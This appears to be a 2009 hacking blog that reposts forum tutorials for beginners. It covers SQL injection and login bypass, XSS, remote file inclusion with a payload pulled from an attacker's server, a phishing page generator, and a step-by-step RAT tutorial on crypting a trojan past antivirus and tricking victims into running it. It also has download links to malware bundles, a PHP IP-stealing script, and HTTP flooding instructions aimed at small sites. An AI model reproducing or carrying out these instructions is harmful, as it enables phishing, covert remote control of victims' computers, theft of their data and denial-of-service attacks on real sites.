Wikipedia is a great site for information. It is not a dictionary but an encyclopedia openly update/changed by the public. So you don't have to worry about read some cryptic definition that leaves you with more questions. Nine out of Ten when you search with Google you will see Wiki at the top or close to.

Hack Forum Search
If there is a new hacking tool you just download and you want to learn more about it and how to use it. Search the HF for it, there is nothing that you as a beginner know more of than our VeTs.

Youtube
Many rules have changed ever since Google bought Youtube in 2006.
More explicit and sensitive videos are allowed more and more than the prevailing years of 2006.
You can search for practically any video dealing with hack tools and attacks.

Batch - Created by Unclean Spirit
Spirit Elementary- Created by Unclean Spirit
You simply can not get more simple than .bat files. Batch files are a good way to introduce yourself to CMD Prompt( to get to: Start>Run: tpye "cmd" enter) However batch files are commonly made with notepad. You can create simple or intricate virus .bat files that cause all sorts of chaos. You can find all kinds of virals at the Batch ,Shell, Dos and Command Line Interpreters

Cain & Abel
Youtube TuT
"Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols."

Ophcrack- Created by Crow
Youtube TuT
Unlike Cain and Abel this program can be burned to a CD or configured to a USB to boot from. Meaning that you can have no password access to any computer profile and still crack the password. As far as i know, Cain and Abel can only function if you have access to at least a guest account.

Telnet Hacking- Created by Follower
Telnet Hack - Provided by Ethical Hacking Articles
(Turn on Windows Vista Telnet) - Created by xgsconan
Youtube TuT
"Telnet is protocol that runs over TCP/IP, and was used for connecting to remote computers. It provides a login interface, and you can run command-line programs by typing the commands on your keyboard, and the programs use the resources of the remote machine. The results are displayed in the terminal window on your machine, but the memory and CPU cycles consumed by the program are located on the remote machine. Therefore, telnet functions as a terminal emulation program, emulating a terminal on the remote machine. "

Aradamax 2.8- Created by VipVince
VicSpy -Created by 3 4 1
Youtube Examples
Keylogging is a method used for gathering information from your victims computer by recording keystrokes, Screenshots, and other activities. It is hard to find Keylogging tools that are completely undetectable to security programs. The few that are undetectable soon are added to security information databases. This reiterates what i said in the beginning, "There is always something new coming out that either replaces or patches(fixes) an older version of software. Therefore necessitating the need for new methods of hacking."

Basic Nmap Usage- Created by Empa7hy
Nmap- Created by Austral Hacker
Youtube TuT
"Nmap ("Network Mapper") is a free and open source (license) utility for network exploration or security auditing." Basically tells you everything you need to know about your targets potential vulnerabilities. Very powerful and needed tool.

This is what I believe a new comer should start with. Many people have different ways of training that work just as well. However, this is the basics of the basics. Become well briefed in all these categories because they are the most used tools for a hacker using the Windows OS. Now you can delve deeper into the world of hacking. Don't forget, "Do not learn to hack, but hack to learn".

This article is taken from hackforum.net

Absolute Basics of Hacking

2009-04-10T11:20:00.000-07:00

The Absolute Basics of Hacking
A writeup by InfamousBytes

Intro
Hello and welcome to this tutorial. If you see all the text on this page, and are afraid, you're not meant to be a hacker, quit now. Also, please know now that unlike in the movies, not everything is hackable. I will be writing about the basics of hacking servers; I will cover how to scan and/or exploit vulnerable daemons (services) running on the target server, and how to discover and/or exploit web-script vulnerabilities. You will need to know your way around a computer before reading this. And if you don't know what a word means, Google or Wiki it!; if you don't understand a concept, post here and I will try to clarify. Thanks for reading, hope this helps.

Recommended Tools
Port Scanner - nmap - http://nmap.org/
Browser - FireFox - http://firefox.com/

Daemon Vulnerabilities
Description
Daemons (also commonly known as services) are the processes that run on a computer that allow it to do things such as serve pages with the HTTP protocol, etc. (although they do not always necessarily interact over a network). Sometimes these daemons are poorly coded, which allows for an attacker to send some sort of input to them, and they either crash, or in worse cases, they run any code the attacker chooses.

Scanning For Vulnerabilites
Well, this is where a little common sense comes in, because we need to answer one question: Which ports to scan? Well, with a little googling, we'd know that the default port for the HTTPD (web daemon) is 80, for the FTPD it's 21, etc. So if we wanted to know the version of the HTTPD running on the server, we'd run "nmap targetsite.com -p 80 -sV". NOTICE the -sV argument; it is vital, otherwise nmap will just return whether or not the port is open, and won't provide us with the daemon's version. This is great and all, but we don't want to just scan one port at a time do we? Well nmap has us covered there, so just scan multiple ports by seperating each target port with a comma (,) like so: "nmap targetsite.com -p 21,80 -sV". However, if you don't mind the scan taking a while longer, you can scan a range of ports like so: "nmap targetsite.com -p 1-1000 -sV". This will scan all ports between 1 and 1000.

Checking For Vulnerability
After your scan has finished, nmap will display the open ports on your target, along with their version (if they were identifiable, usually they are). An example return would look like this: "80/tcp open http Apache httpd 2.0.32". Taking this information, we search on milw0rm for "Apache". After skimming through the results, we see that the target is vulnerable to this vulnerability, which when run on the target server will make it crash.

Using the Exploits
This varies, depending on the language that the exploit is coded in; google on how to do this, since it would just be wasting my time how to use all of the different languages here.

Common Web-Script Vulnerabilities
Description
In this section, I will be writing about vulnerabilities in a webserver's server-sided code. Here are the topics I will be covering:

SQL Injection
XSS (Cross-Site Scripting)
RFI/LFI (Remote/Local File Include)

SQL Injection
Description
SQL injection is the act of injection your own, custom-crafted SQL commands into a web-script so that you can manipulate the database any way you want. Some example usages of SQL injection: Bypass login verification, add new admin account, lift passwords, lift credit-card details, etc.; you can access anything that's in the database.

Example Vulnerable Code - login.php (PHP/MySQL)
Here's an example of a vulnerable login code

PHP Code:

$user = $_POST['u'];
$pass = $_POST['p'];

if (!isset($user) || !isset($pass)) {
    echo("

");
} else {
    $sql = "SELECT `IP` FROM `users` WHERE `username`='$user' AND `password`='$pass'";
    $ret = mysql_query($sql);
    $ret = mysql_fetch_array($ret);
    if ($ret[0] != "") {
        echo("Welcome, $user.");
    } else {
        echo("Incorrect login details.");
    }
}
?>

Basically what this code does, is take the username and password input, and takes the users's IP from the database in order to check the validity of the username/password combo.

Testing Inputs For Vulnerability
Just throw an "'" into the inputs, and see if it outputs an error; if so, it's probably injectable. If it doesn't display anything, it might be injectable, and if it is, you will be dealing with blind SQL injection which anyone can tell you is no fun. Else, it's not injectable.

The Example Exploit
Let's say we know the admin's username is Administrator and we want into his account. Since the code doesn't filter our input, we can insert anything we want into the statement, and just let ourselves in. To do this, we would simply put "Administrator" in the username box, and "' OR 1=1--" into the password box; the resulting SQL query to be run against the database would be "SELECT `IP` FROM `users` WHERE `username`='Administrator' AND `password='' OR 1=1--'". Because of the "OR 1=1", it will have the ability to ignore the password requirement, because as we all know, the logic of "OR" only requires one question to result in true for it to succeed, and since 1 always equals 1, it works; the "--" is the 'comment out' character for SQL which means it ignores everything after it, otherwise the last "'" would ruin the syntax, and just cause the query to fail.

XSS (Cross-Site Scripting)
Description
This vulnerability allows for an attacker's input to be sent to unsuspecting victims. The primary usage for this vulnerability is cookie stealing; if an attacker steals your cookie, they can log into whatever site they stole your cookie from under your account (usually, and assuming you were logged in at the time.)

Example Vulnerable Code - search.php (PHP)

PHP Code:
$s = $_GET['search'];
// a real search engine would do some database stuff here
echo("You searched for $s. There were no results found");
?>

Testing Inputs For Vulnerability
For this, we test by throwing some HTML into the search engine, such as "XSS". If the site is vulnerable to XSS, you will see something like this: XSS, else, it's not vulnerable.

Example Exploit Code (Redirect)
Because we're mean, we want to redirect the victim to goatse (don't look that up if you don't know what it is) by tricking them into clicking on a link pointed to "search.php?search=". This will output "You searched for . There were no results found" (HTML) and assuming the target's browser supports JS (JavaScript) which all modern browsers do unless the setting is turned off, it will redirect them to goatse.

RFI/LFI (Remote/Local File Include)
Description
This vulnerability allows the user to include a remote or local file, and have it parsed and executed on the local server.

Example Vulnerable Code - index.php (PHP)

PHP Code:
$page = $_GET['p'];
if (isset($page)) {
    include($page);
} else {
    include("home.php");
}
?>

Testing Inputs For Vulnerability
Try visiting "index.php?p=http://www.google.com/"; if you see Google, it is vulnerable to RFI and consequently LFI. If you don't it's not vulnerable to RFI, but still may be vulnerable to LFI. Assuming the server is running *nix, try viewing "index.php?p=/etc/passwd"; if you see the passwd file, it's vulnerable to LFI; else, it's not vulnerable to RFI or LFI.

Example Exploit
Let's say the target is vulnerable to RFI and we upload the following PHP code to our server

PHP Code:
unlink("index.php");
system("echo Hacked > index.php");
?>

and then we view "index.php?p=http://our.site.com/malicious.php" then our malicious code will be run on their server, and by doing so, their site will simply say 'Hacked' now.

Conclusion
Tutorial inspired by: the avoidance of homework. Now that you read all that, gtfo.
~IB

THis article is taken from hackforum.net

Ultraphish - Easy Phishing Page

2009-03-08T05:35:00.000-07:00

Ultraphish - Easy Phishing Page Generator

This program is (as stated) a phishing page generator, with compatibly for user-made plugins as well. With this bundle you will receive the following--
AOL
Bebo
Bootleggers
ESpinTheBottle
FaceBook
Freewebs
GMail
Hi5
Hotmail (old)
Login Live
Messblack Forums
MillerSmiles Forums
Mob Life
MSN Delete Checker
Myspace
Rapidshare
Windows Live Mail
World of Warcraft
Yahoo
This is just a small collection of requests I have received. I am open to requests but I will not do PayPal or bank sites. If it is requested enough, I can write up a tutorial on how to create your own plugins.
I may also create a video tutorial upon asking.

How To Use:

Here is a brief (but sweet) tutorial:
Choose a password (This will be used later on)
Pick a Template from the list to be created
Generate your page
Upload it to a php host
???
Profit
Viewing your Logged Passwords:
Probably the most important part of the entire thing.
To view your logged passwords browse to (
Code:

http://fakesite.com/example.php

) and enter 'viewlog' into the email/username field and the password you chose in step 1.
If your password was correct you will be taken to the page with your phished accounts along with their IP Address.

You do not need an email address and nothing is stored on an outside server so it's completely independent.

If you have any questions, simply ask and I'd be happy to answer them. Same goes with requests and such.

I hope I explained everything properly, and enjoy!

EDIT: Yes, I am aware that my website is offline. It has been for quite some time. The branding is simply incase I should ever decide to bring it back.

EDIT 2: Thanks to Dwayne for remind me. There is a 'bug' in the program where when using Vista it will generate a blank php file instead of your phishing page. I am aware of this and have no intentions to fix this in the near future.

http://rapidshare.com/files/114910453/UltraPhish.zip

VTC Ethical Hacking Video

2009-03-08T05:34:00.001-07:00

VTC Ethical Hacking Video

01.Introduction
02.Ethical Hacking & Penetration Testing
03.Methodology Overview
04.Reconnaissance (Footprinting)
05.Scanning
06.Port & Service Enumeration
07.Data Enumeration
08.Vulnerability Assessment
09.Penetration Access Compromise Pt.1
10.Penetration Access Compromise Pt.2
11.Evading Defenses & Erasing Tracks
12.Introduction to Hacking Techniques Pt.1
13.Introduction to Hacking Techniques Pt.2
14.Popular Tools
15.Penetration Test Demo

Code:

http://rapidshare.com/files/114490829/Ethical_Hacking.part1.rar

Code:

http://rapidshare.com/files/114264357/Ethical_Hacking.part2.rar

Code:

http://rapidshare.com/files/114493983/Ethical_Hacking.part3.rar

Use GMail As An Online Storage System

2009-03-08T05:32:00.000-07:00

Use GMail As An Online Storage System

This is a fairly simple and useful trick to score yourself a gigabyte's worth of free online file storage.
GMail Drive is a Shell Namespace Extension that creates a virtual filesystem around your Google Gmail account, allowing you to use Gmail as a storage medium.
GMail Drive creates a virtual filesystem on top of your Google Gmail account and enables you to save and retrieve files stored on your Gmail account directly from inside Windows Explorer. GMail Drive literally adds a new drive to your computer under the My Computer folder, where you can create new folders, copy and drag'n'drop files to.

Download GMail Drive-http://www.filehippo.com/download_gmail_drive/

download Ultimate Hacking Eexperience 2008

2009-03-08T05:31:00.000-07:00

Ultimate Hacking Eexperience 2008

Yuri RAT v1.2
MofoTro v1.7 BETA
Charon
Beast v2.0.7
Omerta v1.3
Theef v2.10
Combined Forces R.A.T
MoSucker v3.0
ProRat v1.9 Fix2

Binders

Daemon Crypt Public v2
NT Packer v2.1
EES binder v1.0
File Injector v3
Bytes Adder
FreshBind v2.01
YAB v2.01
NakedBind v1.0
Amok Joiner

Viruses

Hippi virus
Sasser
W32. Blaster .Worm
Midnight Massacre
00001
Nimda
Loveletter virus
Happy '99
MXZ

MSN Hacks & Bots

HoaX Toolbox 1.1
MSN Extreme 3.0
MessenPass v1.06
Advanced Blood Scroller
Nudge Madness
Advanced Instant Messengers Password Recovery
Contact Spy
Msn Explosion
Encrypted Messenger

Nukers And Flooders

Rocket v1.0
RPCNuke v1.0
Panther Mode1 - 56k
Panther Mode2 - ISDN +
Final Fortune v2.4
Battle Pong - Technophoria
Assault v1.0
ICMP Nuker
CLICK v2.2

Brute Forcers

Munga Bunga 's Official
Brutus - Authentication Engine Test 2
wwwHack v1.946
FTP Brute Hacker
FTP Brute Forcer.tar.gz - Unix
Wbrute.tar.gz - Unix
Shadow Scanner-Brute Forcer
Hackers Utility v1.5
POP3 brute forcer.tar.gz - Unix

Keyloggers

Elite Keylogger v1.0
SKL v0.1
KeySpy v2.0
A++++
Curiosity
Keylogger
KeyCopy

CGI-Bug Scanners

NStealth HTTP Security Scanner v5.8
Attack Toolkit v4.1 & source code included
Scanarator
Legion NetBios Scanner v2.1
NetView v1.0
CGI Vulnerability Scan
CGI Scanner v4.0
VoidEye CGI scanner

Virus Builders

DR VBS
VBSwg 2 beta - Virus builder
p0ke's WormGen 2.0
RESIDUO - DoS Virus

Port & IP Scanners

Blues Port Scanner
ProPort v2.2
SuperScan v3.0
Net Scan Tools v4.2
LanSpy v2.0
Bitchin Threads v3.1
Trojan Hunter v1.5
SuperScan v4.0
Neotrace PRO v3.25 trial&crack say thanks if you like this 1

http://rapidshare.com/files/100985621/UltimateHacking2008.rar.rar

Track Anyone Just By Sending Mail

2009-03-08T05:30:00.000-07:00

Track Anyone Just By Sending Mail

Well u wanna track ur victim or want to get his ip, location, browser settings, language or timings.... all u have to do is get his e-mail id...

Once u have it.

Go to www.readnotify.com

register there...

Once registered . . . send a mail to ur victim by the email id u registered at readnotify.com

But before sending the mail just add ".readnotify.com" with the victims id.. for example

xxxxx@yahoo.com.readnotify.com

and then send it...

when ever victim opens it his all the info will be mailed to u.

which can b very useful for the hackers.

Note = U can also change the settings in www.readnotify.com

SQL Injection the complete Tutorial

2009-03-08T05:29:00.001-07:00

SQL Injection the complete Tutorial

Translated from Portugease :

SQL injection is a technique that explores a vulnerability of security that occur in the database of a layer of application. The vulnerability i present when user input i either incorrectly filtered will go string literal escape characters embedded in SQL statements or user input i not strongly typed and thereby unexpectedly executed. The vulnerability is present when user is or incorrectly screened for literal cord escape built-in characters in the instructions SQL or users strongly are not typed and, like this, unexpectedly performed. It i in fact an instance of it lives general class of vulnerabilities that can occur whenever one programming or scripting language i embedded inside another. It is in fact an example of a form more general class of vulnerabilities that can occur whenever a programming language or scripting is inserted inside another. __________________________________________________ ___________________ Or Be an a lot Way NooB of invade a big quantity of sites. ...........

For that vc is going to be necessary. .....

*Google *internet Connected *Strings *codicos of Sql injection *JAP (is not necessario is good use barely as
security)

Then vamu her. ...............como I am baunzinho I see passes them half from the trabaio. ...
__________________

' to admin shell root First
vc goes in the google and digitizes the following one (allinurl: "Some Of The Strings") Without "Parenteses"

ah vc chooses a site noob applies in the login by example:' or' = 1 sign to same thing:' or' = 1

Promptly now vcs can vary the codicos and itself will want polpar work use some scanner of vulnerability as by example the acunetrix __________________________________________________ ___________________
JAP 00.08.073

JAP — Anonymity & Privacy is a program that is going to guarantee to his privacy while sails for the internet. With that, you avoid that can monitor your accesses and guarantees the your anonymity by the net.

Code:

http://baixaki.ig.com.br/download/JAP.htm

__________________________________________________ __________________

Acunetix Web Vulnerability Scanner 5,0

Omprove itself his site is to the Test of hackers Acunetix Web Vulnerability Scanner is a powerful utility one that analyzes a site in search of possible vulnerabilities.

Code:

http://www.download3000.com/download_11974.html

Text messaging from a computer

2009-03-08T05:28:00.000-07:00

Text messaging from a computer

Site attacking Program

2009-03-08T05:26:00.000-07:00

Site attacking Program
With this program can you attack a site.
Its very simple. There is a tutorial video in it!~

Site attacking Program - Shaify Mehta

http://rapidshare.com/files/95916686/Geprem_V3.00.rar

SQL Injection1

2009-03-08T05:25:00.002-07:00

SQL Injection...

Since the most popular web hacking technique is the sql injection I think you should learn about it. You should know a web scripting language(php is the most popular) and an sql database(MYsql is the most popular) to understand the sql injection. I thought in this topic we can share our knowledge and resources.

This is one of the documents I liked. It's written by cypherxero;

With the growing popularity of websites using the standard php/sql interfaces, a new and dangerous
type of attack is becoming more popular for hackers, and that is sql injection. sql, or Standard Query
Language, is a type of database specification for reading and writing information to a database. This is
used to create dynamic webpages with structured content, and other data types.

The problem is not actually a problem with the sql database itself, but rather how it is accessed
and used via the scripting language on the website. The standard scripting language on the web for
interacting with sql databases is php. The real issue lies with the php programmers not writing the sql
statements correctly, which can allow an attacker to inject their own commands directly to the sql
database. Here's a sample of php code that dynamically builds a sql command to be processed:

$sql = "select * from users where username='".$_GET['username']."' and password = '".md5($_GET['password'])."'";

The sql command would look like this to the database:

select * from users where username='cypherxero' and password = '5f4dcc3b5aa765d61d8327deb882cf99';

This would lookup my username (cypherxero), and then compare the password hash with the one in the
database. If they're the same, then I'm authenticated, and logged in. The problem with this statement is
that there is no sanitation on the user input, so if you entered your own sql command, say for this login
box, then you can bypass authentication!

Consider this sql Statement:

' OR 1=1--

Inserting this into the sql command that already exists, we get this:

select * from users where username='' OR 1=1--' and password = '5f4dcc3b5aa765d61d8327deb882cf99';

This statement would return true (since 1 does equal 1), and the rest of the sql statement after the
double-dashes will be commented out, and the system will return the first username in the database, and
log you into the system as the first user (most likely admin) without the need for a password!

Other ways of using sql injections is with http get statements that pass variables onto the database.
Let's take a look at a real sql injection I found a few weeks ago, in a component on the Joomla CMS. I
first discovered this flaw while doing some random web app sec testing on one of my friend's company's
website. Let's take this url from her site:

http://www.klochko.com/index.php?option=com_philaform&&Itemid=34&form_id=5

As you can tell, we're passing the variables option, Itemid, and form_id to index.php, and the php script
is passing those variables onto the sql database. Let's see what happens when I insert a single tick mark
at the end of the last variable:

You have an error in your sql syntax; check the manual that corresponds to your Mysql server version for
the right syntax to use near \'\\' order by ordering ASC\' at line 1 sql=select * from
jos_philaform_detail where form_id=5\\' order by ordering ascno elements defined

Since we passed a variable that the database didn't know what to do with, it freaked out and returned an
error message. Now, any sane person that's not a hardcore geek would just think something wrong happened,
and try another website. Not me. I knew right then from seeing that message that I had a sql injection,
and that I wanted to see what I could do. I searched google, milw0rm, packetstorm, and securityfocus, and
couldn't find a sql injection for Phil-a-Form, which upon further research, was a piece of software for
Joomla to add extra functionality. So, I figured either it was impossible to get an injection and had been
done before without any luck, or that no one had found it yet. It turns out no one had found it yet, and
now it was a race against the clock to find a proof-of-concept injection and submit it before someone else
found it.

There's a nice little sql command called union that combines data from more than one table into one
output, and that's what I was going to need. My goal was to get the administator password (in MD5 hash
format) from the database. The sql statement from the error messaged helped me understand what was going
on with the query, and helped me write my injection. I knew that it was pulling data from the sql database
for the forms that were on the page. I needed to combine that form table and data from another table onto
one page. I did some research on Joomla, and found the list of the default sql tables, and the format that
they were in. I knew I needed to pull the password from the jos_users table, and that the password field
was called password.

Since union commands need to keep the columns the same for both tables, there were a lot more tables in
the jos_philaform table than in the users table, so to keep the tables the same for the union command, I
had to fill the injection string with enough nulls to make them the same. Since Phil-a-Form is
pay-software, I didn't feel like putting my money down on software that I don't need, so it was just a
matter of trial and error until I had the correct column size. The final sql injection string looked
looked like this:

union select null,null,password,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null
from jos_users --

This statement, put on the end of the "form_id=5", pulled the password has from the database, and returned
it to me on the page. The final result was the form on the page, but at the very bottom, a nice little
error message, with, lo and behold, the MD5 hash of the first user in the table, the administrator.

Fatal error: Cannot instantiate non-existent class: philaform_5f4dcc3b5aa765d61d8327deb882cf99 in
/home/klochko/public_hhtml/components/com_philaform/philaform.class.php on line 437

There it was, what I was looking for, the password in MD5. All that was left was to crack it using rainbow
tables, and then if I was malicous, to log into admin and deface the website, or do whatever I wanted at
that point. My friend's website has since been upgraded to the newer version of Phil-a-Form, and no, that
is not the real admin hash, I don't think they would make their password "password".

Sify Hack For Free Internet !

2009-03-08T05:25:00.001-07:00

Sify Hack For Free Internet !

Use Internet For Free, only sify users

U need are a few utilities like angry ip scanner and a Mac Address changer like Gentle Mac Pro. What you got to do fist is scan your ip range and see who all are online then get their mac address. Then use Gentle Mac Pro and change your ip and mac address to some one who is logged on and Bingo you surfing the net for Free. Here are the Link'z

Angry Ip Scan

www.angryziber.com/ipscan/

Gentle Mac Pro Version 3

www.sharewareconnection.com/gentle-mac-pro.htm

Remote Hacking

2009-03-08T05:24:00.000-07:00

Remote Hacking

n this tutorial you will learn how to hack a computer any where in the world. Ok well not anywhere obviously things like the military and the goverment will have very high security so you definately wont be able 2 hack them using this method. I hope not aniways =\.

A Major Notice If you are behind a router you will need to port forward your router. To do this you can use a DMS. Its hard to explain as every router has a different interface ( homepage that has a different layout ) so i suggest you go to google and search portforward.com. It will teach you how to port forward your router there.

Ok to begin with you will need these three tools

Code:
Daemon Crypt - http://rapidshare.com/files/8161346/Daemon_Crypt.rar
Pc Guard - http://rapidshare.com/files/11136172/PC_GUard.rar
Yuri Rat - http://rapidshare.com/files/8161510/Yuri_Rat.rar
Ok now that you have these three tools your 1st step will be to open up Yuri Rat and then click on server build

Remote Hacking - Shaify Mehta Click this bar to view the small image.
Remote Hacking - Shaify Mehta

n this screen I want you to put your IP address into the DNS/IP section.

To get IP Address go to Start > Run > Type CMD and hit enter. When the black box appears type in IPCONFIG. You will then have your IP Address

Port: You Can Leave As Default (-789Cool

Assigned Name: Doesn?t effect how the server will work its just to keep you more organized so if you wanted to hack your friend ?JOE? and specifically make this server for him then you may want to type something like ?JOES TROJAN?.

Server Install Name: You should leave this as default as I myself don?t know what the difference is as every server you make is named server when it is 1st created anyway. Do not change it as it may make problems but I am not sure.

Ok as you can see there are more settings on the right hand side. I am going to recommend you settings for different purposes

To Hack A Friend For Fun: Uncheck Everything Unless You Want To Do Optional
(OPTIONAL) Melt Server - Your server will disappear into another folder
(OPTIONAL) Custom Icon if you want to make it more believable or something then get an icon of super Mario or something you get my drift

To Find Out Valuable Information: Check Everything

Ok Now You Are Finished Click Build

Your server will then be saved to your C:\ or Hard Drive which ever you know it as. Now we are going to make the server about 90% Undetectable. Only once has one of my servers been detected by an anti virus and I think it was a Norton not sure which version. Ive scanned more then once with Kasper Sky & Symantec Anti Virus and every time they said its clean so lets begin

Open Up Daemon Crypt

Select Your File by clicking browse and going to the folder your server is in. If you have not moved it, it will most likely be in C:\

So Now You Have This

Remote Hacking - Shaify Mehta

Click On Crypt and then you can close Daemon Tools

Now Install Your Pc Guard for Win32

When you open it you should get this

Remote Hacking - Shaify Mehta Click this bar to view the small image.
Remote Hacking - Shaify Mehta

Ok you have to do basically the same thing as what you did with daemon tools. Click Browse and then find your server so that you have this
Remote Hacking - Shaify Mehta Click this bar to view the small image.
Remote Hacking - Shaify Mehta

You then want to click on the General Settings and put these settings
Remote Hacking - Shaify Mehta Click this bar to view the small image.
Remote Hacking - Shaify Mehta

Ok now you want to go to customization and make sure nothing is ticked
Remote Hacking - Shaify Mehta Click this bar to view the small image.
Remote Hacking - Shaify Mehta

For the last step you want to click the protection methods tab and set it to plain. And then click on protect
Remote Hacking - Shaify Mehta Click this bar to view the small image.
Remote Hacking - Shaify Mehta

Your server is now undetectable =)

Ok so now we have our server and everything is ready to go. Only thing now is to do some social engineering. Basically just lie to your friend/victim and tell them that it is a harmless file. If you do not know anything about your victim talk 2 him for like 3 days find out what he likes. Then lets say he likes football and naked women XD. say to him its a funny game where you play a 5minute 2D football match and if you win a sexc girl comes up on the screen and strips or something along them lines. Im not to good at social engineering. You could even say to your friend/victim that it is a patch for a game that you know that they have and it adds on extra things. The Server is now on there computer and they have double clicked it. If you checked the melt server option then the server will basically evaporate into their computer. They say hey its not working you say hey thats strange it works on my comp. Ahh fuck it i cant b bothered 2 send it again..

Ok so now you have the server running on there comp and it has opened up the default port for you to connect to.

Once again open Yuri Rat and click on listen. Yuri rat will then listen for your online servers that you have gave to people running on the default port 7898. If the person who you sent the rat to is not online you cant connect. When the server you sent out to your friend/victim a balloon notification will pop up. Note that yuri rat should still be listening for the servers. The server will show up in yuri rat. You right click and press connect. And there you go. you are now successfully connected to your victim

Remote Hacking - Shaify Mehta Click this bar to view the small image.
Remote Hacking - Shaify Mehta

Ok now without uploading plug ins from yuri rat to your friends/victims computer you will only be able to do limited things with the program which are Download files from there comp & put files from your comp onto their comp.

When you are connected click on plug ins and them upload all of them.

You will then have access to keyloggers, screen capture and muc more. If you get stuck click on the help button and it wil tel you more aout plug ins

Enjoy =)...And REMEMBER THIS IS FOR INFORMATIONAL PURPOSES ONLY...IM NOT RESPONSIBLE FOR ANY OF YOU STUPID FUCKERS GET IN TROUBLE USING IT!!!!

Rapidshare Solution Hack 2008 Edition

2009-03-08T05:20:00.000-07:00

Rapidshare Solution Hack 2008 Edition

Rapidshare And Megaupload Search Plugin Maker
Rapidshare Anti Leech Decrypter 4.0
Rapidmule Rapidshare Downloader
BrutalDown Rapidshare Tips And Hints
Rapidshare/Megaupload Speeder
Rapidshare-The Way You Like It
Rapidshare Account Generator
Rapidshare Leeching ******s
Unlimited Rapidshare With IE
Premium Account Checker
Rapidshare Links Decoder
Renew IP - Gigaset SE105
Rapidshare Time Resetter
RapidLeecher v4.5 Beta
Mac Rapid1.6a Beta11
Premium Accounts 115
RapidLeecher v4.4.87
Rapidshare Checker
Briefcase Leecha 1.83
Rapidshare Decoder
USDownloader 1.3.3
Get Rapidshare 6.0
Rapget v0.96 Beta
The Grabber v1.4.1
Link Grabber v3.1.4
MegaLeecher 1.0.4
Rapidget v1.0
RapidUp v1.1

Rapidshare Solution Hack 2008 Edition - Shaify Mehta
Rapidshare Solution Hack 2008 Edition - Shaify Mehta

Password :- phorum.ws

PhP Ip Stealer

2009-03-08T05:19:00.000-07:00

PhP Ip Stealer

$ip = $REMOTE_ADDR;
$host = gethostbyaddr($ip);
$date = date("d/m/Y H:i:s");
$email = "coiz@daulabuci.com";
$sujet = "Ip + Host";
$message = "
Ip : $ip
Host : $host";
if(mail($email,$sujet,$message,"Content-Type: text/html")){
echo "Ownneeed";}
else { echo "Shit ?";}
?>

Replace coiz@daulabuci.com with your addres mail make a doc.php give him to your friend and you will recive his ip and host in your inbox..

Putting A Site Down

2009-03-08T05:18:00.000-07:00

Putting A Site Down

As simple as 123, follow these easy instructions and you will learn how to put a site down. Its a common activity but its for those who are not familiar with this.

1. Download NetTools 4.5

2. Install the tool

3. Start NetTools and press: Control + M (Reslove Host-IP)
in this tool you can reslove the ip of a host, example below:

4. Now press: Control + X (HTTP Flooder (DoS))
and fill in the fill in the following:

IP to Flood: IP from host (control + m)
Port: 80 (HTTP)
Connections: 9999 (connect with 9999 connections at the same time)

5. Now press Start, however almost all the time just 9999 connections isn't enough sometimes a site needs 49995 (5 times 9999) before its down, hf.

Its old but some weak sites are easy to put down :D (like school sites)

Page hits flooder

2009-03-08T05:16:00.000-07:00

Page hits flooder
increasing page views of your websites

This small program can flood ur page hits.
but you have to dedicate one browser for it.. like internet explorer
method:
make a batch file with these lines
@echo off
:1
start C:\Progra~1\Intern~1\iexplore.exe “http://yoursite.com“
ping -n 10 127.0.0.1 >nul
taskkill.exe /im iexplore.exe
goto 1
depending upon your net speed u may increase the 10 secs time wait
with 10 sec time u may have 360 hits in an hour
with 5 sec time u may have 720 hits in an hour